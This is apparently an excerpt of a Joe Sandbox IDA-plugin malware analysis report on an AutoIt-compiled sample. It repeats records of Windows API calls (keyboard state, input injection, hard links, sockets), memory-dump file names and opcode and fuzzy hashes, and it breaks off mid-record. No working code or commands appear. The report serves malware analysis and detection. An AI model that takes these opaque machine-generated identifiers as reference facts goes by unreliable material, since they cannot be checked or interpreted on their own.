                                                          • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                          • API String ID: 176396367-2734436370
                                                          • Opcode ID: 6834c9850580b54eacd6979db061cee7a249187a4e5cfe3c04e6a42d3d854bec
                                                          • Instruction ID: 2e2d7b17e0efe95e07d6575f09d5b15f7eef7a75d87e25af11adbaa808852c85
                                                          • Opcode Fuzzy Hash: 6834c9850580b54eacd6979db061cee7a249187a4e5cfe3c04e6a42d3d854bec
                                                          • Instruction Fuzzy Hash: 71213A72204621A6D335BB24DC02FBB73D89FA5310F28443AF94997181FB51AF52C7D5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 001B3840
                                                          • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 001B3850
                                                          • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 001B3876
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$MoveWindow
                                                          • String ID: Listbox
                                                          • API String ID: 3315199576-2633736733
                                                          • Opcode ID: 27d49b9218f5455642c83cf082d117c38f6c34dc74e5c69482f307bb40a6cdc2
                                                          • Instruction ID: f52e7526673cde8bfb6305b32e389c183a6ed53ed628b279373fad6c3527fe94
                                                          • Opcode Fuzzy Hash: 27d49b9218f5455642c83cf082d117c38f6c34dc74e5c69482f307bb40a6cdc2
                                                          • Instruction Fuzzy Hash: DC218E72610218BBEB219F55DC85EFB376EEF99750F118224F9149B190CB71DC6287E0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SetErrorMode.KERNEL32(00000001), ref: 00194A08
                                                          • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00194A5C
                                                          • SetErrorMode.KERNEL32(00000000,?,?,001BCC08), ref: 00194AD0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode$InformationVolume
                                                          • String ID: %lu
                                                          • API String ID: 2507767853-685833217
                                                          • Opcode ID: 47a7ca1d58563b3cbfbd751f50170b0110aa658f5b65a189a7dc92aafa78650e
                                                          • Instruction ID: 259304a7b53961331be271c0824e71690ae58a03018a0fa7bfdb40ae53e3c6a3
                                                          • Opcode Fuzzy Hash: 47a7ca1d58563b3cbfbd751f50170b0110aa658f5b65a189a7dc92aafa78650e
                                                          • Instruction Fuzzy Hash: CF317375A00108AFDB10DF58C885EAA7BF8EF08308F1440A5F505EB252D771ED46CBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 001B424F
                                                          • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 001B4264
                                                          • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 001B4271
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID: msctls_trackbar32
                                                          • API String ID: 3850602802-1010561917
                                                          • Opcode ID: aec7618e7d7faadac5396374586c9554b9e4b403188290916aa808ebedd20915
                                                          • Instruction ID: 503dd1ad3dc50f7f57541286e0bedd57f18534b612edcbf79b1bc8165182bede
                                                          • Opcode Fuzzy Hash: aec7618e7d7faadac5396374586c9554b9e4b403188290916aa808ebedd20915
                                                          • Instruction Fuzzy Hash: 5B11E371240248BFEF209E29DC06FEB3BACEF95B54F014114FA55E2091D371DC519B50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00126B57: _wcslen.LIBCMT ref: 00126B6A
                                                            • Part of subcall function 00182DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00182DC5
                                                            • Part of subcall function 00182DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00182DD6
                                                            • Part of subcall function 00182DA7: GetCurrentThreadId.KERNEL32 ref: 00182DDD
                                                            • Part of subcall function 00182DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00182DE4
                                                          • GetFocus.USER32 ref: 00182F78
                                                            • Part of subcall function 00182DEE: GetParent.USER32(00000000), ref: 00182DF9
                                                          • GetClassNameW.USER32(?,?,00000100), ref: 00182FC3
                                                          • EnumChildWindows.USER32(?,0018303B), ref: 00182FEB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                          • String ID: %s%d
                                                          • API String ID: 1272988791-1110647743
                                                          • Opcode ID: 78fb15367d1490a51323d0945124cfaebdfd12c9e2465d30195ba6de6357f4d0
                                                          • Instruction ID: 6b53144a0b691a4d82af2042a2308a624202011a79154e6e41f280ea620660ec
                                                          • Opcode Fuzzy Hash: 78fb15367d1490a51323d0945124cfaebdfd12c9e2465d30195ba6de6357f4d0
                                                          • Instruction Fuzzy Hash: 2911B1B57002056BCF157FB09C85EEE3B6AAFA4704F044075F9199B292DF309A498F70
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 001B58C1
                                                          • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 001B58EE
                                                          • DrawMenuBar.USER32(?), ref: 001B58FD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Menu$InfoItem$Draw
                                                          • String ID: 0
                                                          • API String ID: 3227129158-4108050209
                                                          • Opcode ID: 90d418b3f0626459f060ff95bc917b6e9c592e3c8981bcbdaf6bf5e3664dd698
                                                          • Instruction ID: b3444826f4998f024412687c4b3aac3feb30ad0ac38e80a3ce89781643c0a4ae
                                                          • Opcode Fuzzy Hash: 90d418b3f0626459f060ff95bc917b6e9c592e3c8981bcbdaf6bf5e3664dd698
                                                          • Instruction Fuzzy Hash: 7C012D31600218EFDB219F11DC44BEEBBB5FB45365F1480AAE849D6151DB308A95DF61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 166a6a01a95d410f1a78f0567e249b00028ffa34734a18ef45081f6462325a21
                                                          • Instruction ID: 201e8da7aa6dc1cc3974b2270d43354bc64d9601192ddb70f1c58cb481233aba
                                                          • Opcode Fuzzy Hash: 166a6a01a95d410f1a78f0567e249b00028ffa34734a18ef45081f6462325a21
                                                          • Instruction Fuzzy Hash: 5DC18C75A0020AEFDB55DFA4C898AAEB7B5FF48304F118198E805EB251C770EE85CF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: __alldvrm$_strrchr
                                                          • String ID:
                                                          • API String ID: 1036877536-0
                                                          • Opcode ID: 190bec492484a18a97fe5f025dcdb3e473ceac46589bc02d4dbe4f94f5be8f6e
                                                          • Instruction ID: 376ef9535a776f6424d314adf889a37878be4b85093c0fe3b224d912fcd0ebc3
                                                          • Opcode Fuzzy Hash: 190bec492484a18a97fe5f025dcdb3e473ceac46589bc02d4dbe4f94f5be8f6e
                                                          • Instruction Fuzzy Hash: 9AA17872D00786DFEB15CF18C8917AEBBE4EF21395F28416EE9A59F281C3349989C750
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Variant$ClearInitInitializeUninitialize
                                                          • String ID:
                                                          • API String ID: 1998397398-0
                                                          • Opcode ID: 744f804a2d0fd84658096666893def88177e92397cec101059a34815fbf72a05
                                                          • Instruction ID: 25569b8264cbcf34f0cb5fa14cf7c321dc54531c1da37f0161ae79dbde9d7ae9
                                                          • Opcode Fuzzy Hash: 744f804a2d0fd84658096666893def88177e92397cec101059a34815fbf72a05
                                                          • Instruction Fuzzy Hash: C2A14A796043109FC704DF28D585A2AB7E5FF99714F048859F99AAB3A2DB30EE01CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,001BFC08,?), ref: 001805F0
                                                          • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,001BFC08,?), ref: 00180608
                                                          • CLSIDFromProgID.OLE32(?,?,00000000,001BCC40,000000FF,?,00000000,00000800,00000000,?,001BFC08,?), ref: 0018062D
                                                          • _memcmp.LIBVCRUNTIME ref: 0018064E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: FromProg$FreeTask_memcmp
                                                          • String ID:
                                                          • API String ID: 314563124-0
                                                          • Opcode ID: fa04cc96bf622ce9e53ba7f9f9766b0cc7d360f2d021a8b8b36acca0288fda22
                                                          • Instruction ID: 99057381209e6b2d49c0e63b22fe2586baeec34ba1664bf2d7b13931c55373c7
                                                          • Opcode Fuzzy Hash: fa04cc96bf622ce9e53ba7f9f9766b0cc7d360f2d021a8b8b36acca0288fda22
                                                          • Instruction Fuzzy Hash: 7D810971A00209EFCB45DF94C984EEEB7B9FF89315F204558E506AB250DB71AE4ACF60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID:
                                                          • API String ID: 269201875-0
                                                          • Opcode ID: 24a9b8c79e45ff75a9a5b4094ce8b3343da815c1782b253702317d39601c8657
                                                          • Instruction ID: 699821b62964988b787465770f313e6e19b343950b7bb73f651af596933e6131
                                                          • Opcode Fuzzy Hash: 24a9b8c79e45ff75a9a5b4094ce8b3343da815c1782b253702317d39601c8657
                                                          • Instruction Fuzzy Hash: 9F414F31900111FBDB257BFD9C46ABE3AA5FF61370F1C4225F819D72A1EB7488625262
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetWindowRect.USER32(0178FC68,?), ref: 001B62E2
                                                          • ScreenToClient.USER32(?,?), ref: 001B6315
                                                          • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 001B6382
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Window$ClientMoveRectScreen
                                                          • String ID:
                                                          • API String ID: 3880355969-0
                                                          • Opcode ID: 5608737aa7235cae407c151d168cf594ffa1dd0e3c2a3d988689f76fbd565ed5
                                                          • Instruction ID: 221814fad2593b42f6218bdccf347a41841e2fb8793c99f96bfd9204437bcea6
                                                          • Opcode Fuzzy Hash: 5608737aa7235cae407c151d168cf594ffa1dd0e3c2a3d988689f76fbd565ed5
                                                          • Instruction Fuzzy Hash: 67511974A00209EFDB10DF68D8809EE7BF5FB65364F108269F9599B2A0D774AD81CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • socket.WSOCK32(00000002,00000002,00000011), ref: 001A1AFD
                                                          • WSAGetLastError.WSOCK32 ref: 001A1B0B
                                                          • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 001A1B8A
                                                          • WSAGetLastError.WSOCK32 ref: 001A1B94
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$socket
                                                          • String ID:
                                                          • API String ID: 1881357543-0
                                                          • Opcode ID: d5667c000ba2357ba42e43b5610bbfaf7c579ae6e007c82a2abcfa0d3d6edcfd
                                                          • Instruction ID: a9c4670e49b499b535f67e0c41034b73572ad01b2049c5c3736f10c2f1a5c101
                                                          • Opcode Fuzzy Hash: d5667c000ba2357ba42e43b5610bbfaf7c579ae6e007c82a2abcfa0d3d6edcfd
                                                          • Instruction Fuzzy Hash: DD41C338600210AFE720AF24D886F2A77E5AF59718F54844CF91A9F7D2D772DD41CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7aa36b4e9e5b0db3935e00eba58b8d2211c7b163644dabf31a6c7a305f0fee5e
                                                          • Instruction ID: 3475f06c0b30aa5bff8769bf7aad3d0d2f8674d3052b9f78328790a36f5331b1
                                                          • Opcode Fuzzy Hash: 7aa36b4e9e5b0db3935e00eba58b8d2211c7b163644dabf31a6c7a305f0fee5e
                                                          • Instruction Fuzzy Hash: F541E472A04314FFD7249F38CC81B6ABBA9EB98711F20452EF962DF292D771D9058780
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00195783
                                                          • GetLastError.KERNEL32(?,00000000), ref: 001957A9
                                                          • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 001957CE
                                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 001957FA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: CreateHardLink$DeleteErrorFileLast
                                                          • String ID:
                                                          • API String ID: 3321077145-0
                                                          • Opcode ID: bd32ae9b50bdb2ec3dab551ea7c9fca75e0e045689bb6ecb793208973d7aec1a
                                                          • Instruction ID: d37e1d63d4598d97d7461d74a37c113e0be17f352abd5c728379851ac711119a
                                                          • Opcode Fuzzy Hash: bd32ae9b50bdb2ec3dab551ea7c9fca75e0e045689bb6ecb793208973d7aec1a
                                                          • Instruction Fuzzy Hash: A6411D39600620DFCB15EF55D544A5EBBE2EF99320B198488E94AAB362CB34FD50CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00146D71,00000000,00000000,001482D9,?,001482D9,?,00000001,00146D71,8BE85006,00000001,001482D9,001482D9), ref: 0015D910
                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0015D999
                                                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0015D9AB
                                                          • __freea.LIBCMT ref: 0015D9B4
                                                            • Part of subcall function 00153820: RtlAllocateHeap.NTDLL(00000000,?,001F1444,?,0013FDF5,?,?,0012A976,00000010,001F1440,001213FC,?,001213C6,?,00121129), ref: 00153852
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                          • String ID:
                                                          • API String ID: 2652629310-0
                                                          • Opcode ID: 766f2084a030f4f90aea9a6d6c81c74ed1e3b4eef56ed57fc5a06f42421c49de
                                                          • Instruction ID: 823ec4f9bb5d8e0e12212a0a427a98576b635a26379b78ac496887955d52428e
                                                          • Opcode Fuzzy Hash: 766f2084a030f4f90aea9a6d6c81c74ed1e3b4eef56ed57fc5a06f42421c49de
                                                          • Instruction Fuzzy Hash: 1A31D072A0020AEBDF25DF64EC41EAE7BA5EB41315F050268FC24EB160EB35CD58CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 001B5352
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 001B5375
                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 001B5382
                                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 001B53A8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: LongWindow$InvalidateMessageRectSend
                                                          • String ID:
                                                          • API String ID: 3340791633-0
                                                          • Opcode ID: f6751cfe7abfff2e69012f0ea801a24a6155c8b1964e4bac39ef55a5ae195326
                                                          • Instruction ID: 993d61255bdc74f440ae551170527a02a7d7029737aed4fd15306098c064c5cd
                                                          • Opcode Fuzzy Hash: f6751cfe7abfff2e69012f0ea801a24a6155c8b1964e4bac39ef55a5ae195326
                                                          • Instruction Fuzzy Hash: 64318B34A55A08EFEB349B14CC56FE877E7BB04390F584102FA11963F1C7B5A980DB92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 0018ABF1
                                                          • SetKeyboardState.USER32(00000080,?,00008000), ref: 0018AC0D
                                                          • PostMessageW.USER32(00000000,00000101,00000000), ref: 0018AC74
                                                          • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 0018ACC6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
